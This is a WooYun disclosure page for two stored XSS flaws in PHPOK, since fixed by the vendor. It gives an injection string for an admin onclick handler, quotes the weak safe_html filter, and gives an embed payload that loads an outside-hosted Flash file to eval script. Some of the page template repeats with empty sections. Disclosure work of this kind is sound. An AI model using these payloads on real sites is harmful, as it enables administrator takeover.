PHPOK 存储型 xss两处 | wooyun-2014-073758| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073758

漏洞标题：PHPOK 存储型 xss两处

漏洞作者：路人甲

提交时间：2014-08-26 16:15

修复时间：2014-11-24 16:16

公开时间：2014-11-24 16:16

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-26：细节已通知厂商并且等待厂商处理中
2014-08-26：厂商已经确认，细节仅向厂商公开
2014-10-20：细节向核心白帽子及相关领域专家公开
2014-10-30：细节向普通白帽子公开
2014-11-09：细节向实习白帽子公开
2014-11-24：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

前台功能存在存储型 xss，可攻击后台，获取管理员权限。

详细说明：

第一处xss漏洞：
留言功能。
后台的输出点有一处输出如下：

<a class="icon delete end" onclick="content_del('1299','[输入]')" title="删除"></a>

可以看出，我们留言的标题直接输出在 onclick 事件中了，可简单构造 '+alert(1)+'，管理员删除留言时触发：

此时输出：

<a class="icon delete end" onclick="content_del('1299','test'+alert(1)+'')" title="删除"></a>

第二处xss漏洞：
PHPOK 过滤 XSS 的函数如下：

function safe_html($info)
	{
		if(!$info)
		{
			return false;
		}
		$tmp = "/<([a-zA-Z0-9]+)(.*)(on[abort|beforeonload|blur|change|click|contextmenu|dblclick|drag|dragend|dragenter|dragleave|dragstart|drop|error|focus|keydown|keypress|keyup|load|message|mousedown|mousemove|mouseover|mouseout|mouseup|mousewheel|reset|resize|scroll|select|submit|unload]+)=(.+)>/isU";
		$info = preg_replace($tmp,"<\\1\\2\\4>",$info);
		//$info = preg_replace("/<([a-zA-Z0-9]+)(.*)([onabort|onbeforeonload|onblur|onchange|onclick|oncontextmenu|ondblclick|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onfocus|onkeydown|onkeypress|onkeyup|onload|onmessage|onmousedown|onmousemove|onmouseover|onmouseout|onmouseup|onmousewheel|onreset|onresize|onscroll|onselect|onsubmit|onunload]+)\s*=\s*(.+)>/isU","<\\1\\3>",$info);
		$tmp = array("/<script(.*)<\/script>/isU","/<frame(.*)>/isU","/<\/fram(.*)>/isU","/<iframe(.*)>/isU","/<\/ifram(.*)>/isU","/<style(.*)<\/style>/isU","/<link(.*)>/isU","/<\/link>/isU");
		$info = preg_replace($tmp,'',$info);
		return $info;
	}

可见只对标签和 on 事件属性做了一些过滤，可轻松绕过。比如，通过引入 flash 文件进行 xss：

<embed src="http://chuhades.sinaapp.com/xss.swf" quality="high" bgcolor="#ffffff" width="500" height="500" name="FlashVars" align="middle" allowscriptaccess="always" flashvars="action=eval&codz=alert(document.domain)" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">

前台：

后台：

漏洞证明：

第一处xss证明：

第二处xss证明：
前台：

后台：

修复方案：

对进入 js，html 标签事件的字符串进行 js 编码

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-08-26 18:45

厂商回复：

感谢您提供的BUG，哎，现在才知道你们太牛了！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073758

漏洞标题：PHPOK 存储型 xss两处

相关厂商：phpok.com

漏洞作者：路人甲

提交时间：2014-08-26 16:15

修复时间：2014-11-24 16:16

公开时间：2014-11-24 16:16

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073758

漏洞标题：PHPOK 存储型 xss两处

相关厂商：phpok.com

漏洞作者： 路人甲

提交时间：2014-08-26 16:15

修复时间：2014-11-24 16:16

公开时间：2014-11-24 16:16

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-073758"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云